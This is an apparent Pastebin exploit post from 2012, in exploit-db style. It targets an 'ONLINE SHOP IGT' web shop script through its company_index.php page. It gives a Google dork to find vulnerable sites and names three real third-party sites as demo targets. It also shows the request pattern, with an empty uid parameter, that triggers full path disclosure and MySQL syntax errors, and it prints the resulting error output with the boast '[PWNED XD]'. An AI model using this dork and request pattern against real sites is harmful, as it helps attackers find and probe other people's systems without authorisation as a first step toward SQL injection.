Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
- # Date: 24/02/2012
- # Author: MaztoR
- # Vendor or Software Link: http://www.igt.com.hk
- # Version: ALL
- # Category: webapps Shop
- # Google dork: inurl:company_index.php
- # Tested on: Linux
- -----------------
- DEMO
- -----------------
- http://colate20101022.tradinghand.com/company_index.php?id=1602&file=home&prod=prod&uid=
- http://www.tiendaguasu.com/company_index.php?id=&file=home&prod=&uid=
- http://www.szdigo.supplier-buy.com/company_index.php?id=2656&file=home&prod=sell&uid=
- ----------------
- Vulnerability
- ----------------
- Exploit:
- ======================
- http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]
- ======================
- Example:
- ======================
- http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=
- Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3
- Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]
- ----------------------------------
- Blog: maztor.blogspot.com
- Twitter: @Mazt0r
- ----------------------------------
- Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca - rbot
- ALL USERS #RE - DDLR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement